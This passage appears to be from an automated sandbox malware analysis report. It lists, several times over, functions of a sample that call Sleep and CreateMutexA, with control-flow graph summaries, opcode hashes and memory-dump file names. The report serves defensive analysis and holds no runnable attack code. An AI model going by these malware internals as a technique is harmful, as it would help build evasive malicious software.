                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894052631.000000000071B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894085959.0000000000727000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894217877.0000000000877000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894254008.0000000000879000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894286708.0000000000890000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894315752.0000000000893000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.0000000000894000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894386892.00000000008A3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894412008.00000000008A4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894442945.00000000008A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894470213.00000000008A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894492965.00000000008B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894515768.00000000008B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894537148.00000000008B6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894576852.00000000008B7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894603891.00000000008CE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894626718.00000000008CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894699158.00000000008FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894749634.00000000008FF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894776962.0000000000900000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894803763.0000000000906000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894827905.0000000000913000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894855670.0000000000918000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894882955.0000000000923000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894905337.0000000000926000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894929431.000000000092E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894956291.0000000000933000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894984941.0000000000934000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895008385.000000000093A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895358763.0000000000942000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895377721.0000000000944000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895401708.0000000000954000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895420364.0000000000955000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895443058.000000000095E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000960000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000982000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895527442.00000000009B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895549562.00000000009B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895567395.00000000009B2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895584930.00000000009B8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895601986.00000000009BA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895623819.00000000009C8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895648962.00000000009C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6b0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                            • String ID: T2q
                                                                                                                                                                                                                                                            • API String ID: 1464230837-1585859237
                                                                                                                                                                                                                                                            • Opcode ID: 5498c2dc00fad7b5cea35b553682b1a63737cfe9c83adf6c3f3d54c8b79bc61a
                                                                                                                                                                                                                                                            • Instruction ID: c2825c21e8db0f45978f49ddbe9ffa026a9df25e634506e083766393103d4541
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5498c2dc00fad7b5cea35b553682b1a63737cfe9c83adf6c3f3d54c8b79bc61a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 753109B17102008BEB18EBBCD889BEDB763EB85314F24821DE054DB3D5CB7599C18726
                                                                                                                                                                                                                                                            Function 006BA682 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 294 6ba682-6ba6a2 298 6ba6d0-6ba6ec 294->298 299 6ba6a4-6ba6b0 294->299 300 6ba71a-6ba739 298->300 301 6ba6ee-6ba6fa 298->301 302 6ba6b2-6ba6c0 299->302 303 6ba6c6-6ba6cd call 6cd663 299->303 306 6ba73b-6ba747 300->306 307 6ba767-6ba916 call 6c80c0 300->307 304 6ba6fc-6ba70a 301->304 305 6ba710-6ba717 call 6cd663 301->305 302->303 308 6ba949 302->308 303->298 304->305 304->308 305->300 314 6ba749-6ba757 306->314 315 6ba75d-6ba764 call 6cd663 306->315 312 6ba94e 308->312 313 6ba949 call 6e6c6a 308->313 317 6ba953-6ba994 Sleep CreateMutexA 312->317 318 6ba94e call 6e6c6a 312->318 313->312 314->308 314->315 315->307 326 6ba9a7-6ba9a8 317->326 327 6ba996-6ba998 317->327 318->317 327->326 328 6ba99a-6ba9a5 327->328 328->326
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 006BA963
                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Offset: 006B0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893788033.00000000006B0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893865869.0000000000712000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894028787.0000000000719000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894052631.000000000071B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894085959.0000000000727000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894217877.0000000000877000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894254008.0000000000879000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894286708.0000000000890000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894315752.0000000000893000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.0000000000894000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894386892.00000000008A3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894412008.00000000008A4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894442945.00000000008A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894470213.00000000008A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894492965.00000000008B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894515768.00000000008B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894537148.00000000008B6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894576852.00000000008B7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894603891.00000000008CE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894626718.00000000008CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894699158.00000000008FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894749634.00000000008FF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894776962.0000000000900000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894803763.0000000000906000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894827905.0000000000913000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894855670.0000000000918000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894882955.0000000000923000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894905337.0000000000926000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894929431.000000000092E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894956291.0000000000933000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894984941.0000000000934000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895008385.000000000093A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895358763.0000000000942000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895377721.0000000000944000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895401708.0000000000954000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895420364.0000000000955000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895443058.000000000095E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000960000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000982000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895527442.00000000009B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895549562.00000000009B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895567395.00000000009B2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895584930.00000000009B8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895601986.00000000009BA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895623819.00000000009C8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895648962.00000000009C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6b0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                            • String ID: T2q
                                                                                                                                                                                                                                                            • API String ID: 1464230837-1585859237
                                                                                                                                                                                                                                                            • Opcode ID: 0a30676bd57231737f2119e0c2468e66e8362fa19fe3708cb9229f8f46171e39
                                                                                                                                                                                                                                                            • Instruction ID: 3ab9f17e2c88a03e3375167a2419628c4e581786a11cad9a14c46def0526866a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a30676bd57231737f2119e0c2468e66e8362fa19fe3708cb9229f8f46171e39
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D73127B17142009BEB18EBB8DC85BEDB773EB85310F248228E014DB3D5DB7559C18766
                                                                                                                                                                                                                                                            Function 006B9AE9 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 104sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 330 6b9ae9-6b9af8 331 6b9afe-6b9b27 call 6cd663 330->331 332 6ba917 330->332 341 6b9b29-6b9b35 331->341 342 6b9b55-6b9b57 331->342 333 6ba953-6ba994 Sleep CreateMutexA 332->333 334 6ba917 call 6e6c6a 332->334 339 6ba9a7-6ba9a8 333->339 340 6ba996-6ba998 333->340 334->333 340->339 345 6ba99a-6ba9a5 340->345 346 6b9b4b-6b9b52 call 6cd663 341->346 347 6b9b37-6b9b45 341->347 343 6b9b59-6ba916 call 6c80c0 342->343 344 6b9b65-6b9d91 call 6c7a00 call 6b5c10 call 6b8b30 call 6c8220 call 6c7a00 call 6b5c10 call 6b8b30 call 6c8220 342->344 345->339 346->342 347->332 347->346
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 006BA963
                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Offset: 006B0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893788033.00000000006B0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893865869.0000000000712000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894028787.0000000000719000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894052631.000000000071B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894085959.0000000000727000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894217877.0000000000877000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894254008.0000000000879000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894286708.0000000000890000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894315752.0000000000893000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.0000000000894000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894386892.00000000008A3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894412008.00000000008A4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894442945.00000000008A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894470213.00000000008A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894492965.00000000008B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894515768.00000000008B5000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894537148.00000000008B6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894576852.00000000008B7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894603891.00000000008CE000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894626718.00000000008CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894647864.00000000008D7000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894669390.00000000008E3000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894699158.00000000008FB000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894749634.00000000008FF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894776962.0000000000900000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894803763.0000000000906000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894827905.0000000000913000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894855670.0000000000918000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894882955.0000000000923000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894905337.0000000000926000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894929431.000000000092E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894956291.0000000000933000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894984941.0000000000934000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895008385.000000000093A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895358763.0000000000942000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895377721.0000000000944000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895401708.0000000000954000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895420364.0000000000955000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895443058.000000000095E000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000960000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895465045.0000000000982000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895527442.00000000009B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895549562.00000000009B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895567395.00000000009B2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895584930.00000000009B8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895601986.00000000009BA000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895623819.00000000009C8000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1895648962.00000000009C9000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_6b0000_1I15f6.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                            • String ID: T2q
                                                                                                                                                                                                                                                            • API String ID: 1464230837-1585859237
                                                                                                                                                                                                                                                            • Opcode ID: cde7f0b1aec49fc2303961a5e390396ab32aa1658a8f2087c3422feb892bfe20
                                                                                                                                                                                                                                                            • Instruction ID: d640ec4362dcd1b65da82fa6f9428e0d381854d5f68aef3ffadb9816d839804a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cde7f0b1aec49fc2303961a5e390396ab32aa1658a8f2087c3422feb892bfe20
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C215BB17142009BEB14ABACEC85BEDB767EB81310F20431DE518D77D5C77959C18722
                                                                                                                                                                                                                                                            Function 006BA856 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100sleepsynchronizationCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 406 6ba856-6ba86e 407 6ba89c-6ba89e 406->407 408 6ba870-6ba87c 406->408 411 6ba8a9-6ba8b1 call 6b7d30 407->411 412 6ba8a0-6ba8a7 407->412 409 6ba87e-6ba88c 408->409 410 6ba892-6ba899 call 6cd663 408->410 409->410 413 6ba94e 409->413 410->407 423 6ba8b3-6ba8bb call 6b7d30 411->423 424 6ba8e4-6ba8e6 411->424 415 6ba8eb-6ba916 call 6c80c0 412->415 417 6ba953-6ba987 Sleep CreateMutexA 413->417 418 6ba94e call 6e6c6a 413->418 426 6ba98e-6ba994 417->426 418->417 423->424 430 6ba8bd-6ba8c5 call 6b7d30 423->430 424->415 428 6ba9a7-6ba9a8 426->428 429 6ba996-6ba998 426->429 429->428 431 6ba99a-6ba9a5 429->431 430->424 435 6ba8c7-6ba8cf call 6b7d30 430->435 431->428 435->424 438 6ba8d1-6ba8d9 call 6b7d30 435->438 438->424 441 6ba8db-6ba8e2 438->441 441->415
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000064), ref: 006BA963
                                                                                                                                                                                                                                                            • CreateMutexA.KERNEL32(00000000,00000000,00713254), ref: 006BA981
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1893865869.00000000006B1000.00000040.00000001.01000000.00000006.sdmp, Offset: 006B0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893788033.00000000006B0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1893865869.0000000000712000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894028787.0000000000719000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894052631.000000000071B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894085959.0000000000727000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894217877.0000000000877000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894254008.0000000000879000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894286708.0000000000890000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894315752.0000000000893000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.0000000000894000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894340548.000000000089B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894386892.00000000008A3000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894412008.00000000008A4000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894442945.00000000008A6000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894470213.00000000008A7000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894492965.00000000008B0000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1894515768.00000000008B5000.00000040.00000001.01000000.00000006.sdmpDownload File
